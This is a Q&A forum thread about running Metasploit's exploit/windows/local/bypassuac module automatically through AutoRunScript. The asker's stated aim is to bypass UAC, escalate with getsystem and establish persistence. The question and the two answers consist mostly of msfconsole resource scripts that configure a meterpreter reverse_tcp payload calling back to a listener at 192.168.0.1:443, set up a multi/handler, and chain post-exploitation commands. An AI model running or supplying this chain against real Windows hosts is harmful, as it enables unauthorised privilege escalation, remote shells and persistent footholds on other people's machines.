# How to run exploit/windows/local/bypassuac using AutoRunScript?

Tags: metasploit

Is there a way to run exploits that require parameters, such as the one in the title, using AutoRunScript?

I was able to use AutoRunScript to execute some post commands perfectly, such as `keylog_recorder` or `checkvm`.

But when I added the my script this:

```
use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit
```

I got this:

```
[*]     Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*]     Running command set TARGET 0
[-] Unknown command: set.
[*]     Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.
```

Clearly I'm missing something here. How can I do this? My objective is to be able to bypass UAC, use getsystem and then get a foothold using the persistence options.

As a side note, I understand that using "set SESSION 1" will only work for the first computer in the engagement. I would need to somehow use a variable to refer to the session that is currently initiating.

Anyone has any solutions for this?

Answer (score 3):

You need to give the options directly where you are setting the AutoRunScript.

```
msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443
```

Answer (score 1):

You cannot execute those commands in a AutoRunScript because they are commands to the msfconsole, while the AutoScriptRun works only on the context of meterpreter. 
So, you'd need something like these:

> ```
> #msfconsole.rc
>    #Configure your listener and payload
>    use multi/handler
>    set PAYLOAD windows/meterpreter/reverse_tcp
>    set LHOST 192.168.0.1
>    set LPORT 443
>    set AutoRunScript auto.rc
>    exploit -j
>    use exploit/windows/local/bypassuac
>    set TARGET 0
>    set PAYLOAD windows/meterpreter/reverse_tcp
>    set LHOST 192.168.0.1
>    set LPORT 443
>    set DisablePayloadHandler true
>    set SESSION 1
>    set TECHNIQUE EXE
>    set ExitOnSession false
>    #here you can also set another AutoRunScript for your new payload
>    exploit
> ```

And on the auto.rc you can put things like:

> #auto.rc
>
> sysinfo
>      checkvm

And any other meterpreter command or post module.